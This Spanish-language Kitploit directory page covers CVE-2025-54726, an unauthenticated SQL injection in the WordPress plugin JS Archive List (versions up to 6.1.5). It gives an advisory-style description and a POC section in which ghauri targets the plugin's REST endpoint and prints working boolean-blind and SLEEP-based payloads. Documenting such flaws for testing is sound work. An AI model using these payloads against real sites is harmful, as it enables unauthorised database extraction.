Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-54726 — JS Archive List <= 6.1.5 - Inyección SQL no autenticada | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2025-54726
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubrandomrobbiebf/cve-2025-54726

CVE-2025-54726

JS Archive List <= 6.1.5 - Inyección SQL no autenticada

Ver Repositorio
hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54726

JS Archive List <= 6.1.5 - Inyección SQL no autenticada

Descripción

El plugin JS Archive List para WordPress es vulnerable a Inyección SQL en todas las versiones hasta la 6.1.5 inclusive, debido a un escape insuficiente en el parámetro proporcionado por el usuario y a la falta de preparación adecuada en la consulta SQL existente. Esto permite que atacantes no autenticados añadan consultas SQL adicionales a las consultas ya existentes, que pueden ser utilizadas para extraer información sensible de la base de datos.

Detalles

  • Tipo: plugin
  • Slug: jquery-archive-list-widget
  • Versión afectada: 6.1.5
  • Puntuación CVSS: 7.5
  • Clasificación CVSS: Alta
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2025-54726
  • Estado: Activo

POC

root@kitploit:~
ghauri  -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"


  ________.__                        .__  {1.4.1}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 Herramienta avanzada de detección y explotación de inyección SQL.



[*] iniciando @ 16:39:05 /2025-09-25/

[16:39:05] [INFO] probando conexión a la URL objetivo
Ghauri reanudó el(los) siguiente(s) punto(s) de inyección de la sesión almacenada:
---
Parámetro: cats (GET)
    Tipo: blind basado en booleanos
    Título: AND blind basado en booleanos - cláusula WHERE o HAVING
    Payload: cats=1 AND 01609=1609&exclusionType=exclude

    Tipo: blind basado en tiempo
    Título: MySQL >= 5.0.12 blind basado en tiempo (IF - comentario)
    Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] probando MySQL
[16:39:05] [INFO] confirmando MySQL
[16:39:06] [INFO] el DBMS del backend es MySQL

Descargar herramienta